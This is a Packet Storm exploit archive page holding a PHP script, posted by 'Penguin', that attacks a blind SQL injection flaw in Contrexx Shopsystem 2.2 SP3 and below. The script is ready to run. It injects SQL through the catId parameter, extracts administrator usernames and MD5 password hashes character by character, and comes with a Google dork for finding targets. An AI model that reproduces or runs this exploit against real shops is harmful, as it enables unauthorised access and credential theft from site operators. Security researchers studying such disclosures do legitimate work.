exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Contrexx Shopsystem 2.2 SP3 Blind SQL Injection

Contrexx Shopsystem 2.2 SP3 Blind SQL Injection
Posted Aug 18, 2011
Authored by Penguin

Contrexx Shopsystem versions 2.2 SP3 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 42f8094528155fd68e531ce5a127934ab6b53e095f3045260529c3a5158a19ed

Contrexx Shopsystem 2.2 SP3 Blind SQL Injection

Change Mirror Download
#!/usr/bin/php
<?php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit written by: Penguin
Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Software price: abount 700 CHF
Vendor: http://www.contrexx.com
Found by: Penguin
Version: =< 2.2 SP 3
Dork: inurl:index.php?section=shop&catId=
Vendor: www.contrexx.com
Visit: www.null-sector.info
Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head
*/
echo "#######################################\r\n";
echo "# Contrexx Shopsystem Exploit #\r\n";
echo "# Exploit Type: Blind SQL Injection #\r\n";
echo "# Programmed by: Penguin #\r\n";
echo "# Visit www.null-sector.info #\r\n";
echo "#######################################\r\n";
if($argc < 4)
{
echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)\r\n";
echo "TARGET_URL = http://demo.de/index.php\r\n";
echo "CATID = CategoryId (MUST BE VALID!)\r\n";
echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0\r\n";
die();
}
// Config Variables
$target_url = $argv[1] . "?section=shop&catId=" . $argv[2];
$charset_start_usr = 33;
$charset_end_usr = 126;
$charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$toLength = 100;
//Functions
function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit)
{
$username = "";
// Get Length
$length = -1;
for($i=0;$i<$toLength;$i++)
{
$url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i;
$src = file_get_contents($url);
if(testIt($src) == true)
{
$length = $i;
break;
}
}
if ($length == -1)
{
die("There was a problem @ fetching username length :(\r\n");
}
echo "Username length: $length !\r\n";
$username = "";
echo "Username: ";
for($k=0;$k<$length;$k++)
{
$charToAdd = "";
for($c=$charset_start;$c<$charset_end;$c++)
{
$p = $k+1;
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)");
if(testIt($src) == true)
{
$charToAdd = $c;
break;
}
}
echo chr($c);
$username .= chr($c);
}
echo "\r\n";
return $username;
}

function getHash($toLength, $charset, $target_url,$limit)
{
// Get Hash

$hash = "";
echo "Hash: ";
for($k=0;$k<32;$k++)
{
$charToAdd = "";
for($c=0;$c<count($charset);$c++)
{
$p = $k+1;
$z = $charset[$c];
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)");
file_put_contents("test.html",$src);
if(testIt($src) == true)
{
$charToAdd = $charset[$c];
break;
}
}
echo chr($charToAdd);
$hash .= chr($charToAdd);
}
echo "\r\n";
return $hash;
}

function testIt($src)
{
$check = explode("<div class=\"description\">",$src);
if(count($check) >= 2)
{
return true;
}
return false;
}

echo "Starting exploit....\r\nChecking if Vulnerable...";
$check = file_get_contents($target_url . "'");
if(testIt($check) == true)
{
die("Target is not Vulnerable :(\r\n");
}

$myLimit = $argv[3];
echo "Target is Vulnerable :)\r\n";
echo "Starting the SQL Injection...\r\n";
echo "Fetching Username...\r\n";
$username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit);
$hash = getHash($toLength,$charset_hash,$target_url,$myLimit);
echo "Exploited Successfully!\r\n";
echo "Full Logindata: $username : $hash\r\n";
echo "Have fun ;)\r\n";
?>

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close